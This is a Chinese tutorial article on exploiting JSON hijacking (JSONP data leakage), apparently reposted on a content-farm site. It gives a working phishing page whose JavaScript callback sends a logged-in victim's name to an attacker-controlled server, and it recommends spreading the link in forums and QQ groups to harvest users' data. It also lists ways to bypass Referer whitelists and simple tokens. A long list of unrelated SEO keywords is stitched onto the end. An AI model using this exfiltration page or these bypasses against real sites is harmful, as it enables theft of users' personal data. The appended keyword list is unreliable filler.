如何进行JSON Hijacking实战利用
发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,这篇文章将为大家详细讲解有关如何进行JSON Hijacking实战利用,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。前言JSON Hijacking
千家信息网最后更新 2025年01月20日如何进行JSON Hijacking实战利用
这篇文章将为大家详细讲解有关如何进行JSON Hijacking实战利用,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。
前言
JSON Hijacking漏洞的详细利用,有点类似与CSRF,不过原理利用方式不同,在这边文章我着重讲解json跨域劫持的利用环境搭建与方式。
0×01漏洞的挖掘
一般挖掘的过程中,burpsuite代理的History做寻找,过滤多余不可能存在漏洞的一些链接,如下图所示:
我们在返回包中json格式发现了如下的敏感信息(用户Id,用户名,用户手机号码)。
0×02漏洞的证明之poc
提交漏洞,poc在众测时要争分夺秒,所以这边用了最精简的一个POC。
假如返回的数据为:
txf({"data":{"name":"唐晓峰"}});
即可如下弹窗:
0×03漏洞的利用之钓鱼
1.准备一台web服务器,我直接phpstudy搭的。
附上服务器端的代码
json.php
钓鱼.html
txf
var xmlhttp;
function txf(a)
{
xmlhttp=new XMLHttpRequest()
var x="http://***.***.***/json.php?name="+a.data.name;
xmlhttp.open("GET", x, true);
xmlhttp.send();
}
>
>
把钓鱼链接http://***.***.***/钓鱼.html发给该网站已登陆的用户,如论坛,社区QQ群,社区贴吧等,服务端即可获取到大量用户敏感数据。
这边以hackone的一个项目为例:
0×04漏洞的修复与绕过
因为这个例子是小伙伴发过来的还没修复,所以都脱敏了,我们再从开发修复的角度去思考如何绕过修复。
1.Referer白名单
子域名绕过,文件名绕过,空Referer绕过
2.增加token认证
token足够复杂或者服务端加密,我们无法绕过,如果token很简单,如纯数字,我们可以尝试遍历绕过
3.接口禁用
无敌的操作,无法绕过
关于如何进行JSON Hijacking实战利用就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
漏洞
用户
服务
文章
实战
内容
数据
方式
更多
服务器
知识
社区
篇文章
链接
不同
不错
复杂
争分夺秒
代码
例子
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
三星服务器ddr5
微软数据库认证考试
有潜力的mysql数据库备份
魔兽世界切换服务器
数据库颜色不能为黄色
公安大学网络安全专业就业
软件开发神话
数据库中每一条数据
网络安全性龙头股
列举三种数据库应用系统
不属于服务器操作系统的有哪些
数据分析图形化操作数据库
软件开发设施需求包括哪些
网络安全法规定 个人发
软件开发系统集成服务
网络安全自主可控公司
山东绿萝互联网科技公司
网络安全的特色作业
中国网络安全监察小组组长
计算机网络技术三年专科
IP网络技术及应用答案
数据库源码编写语言
台州搜网网络技术有限公司
信息安全 网络安全形势分析
简述软件开发中的瀑布模型
上海服装CAD软件开发
视频监控网络安全吗
软件开发蓝盘的区别
win7搭建手游服务器
广东揭阳dns服务器云主机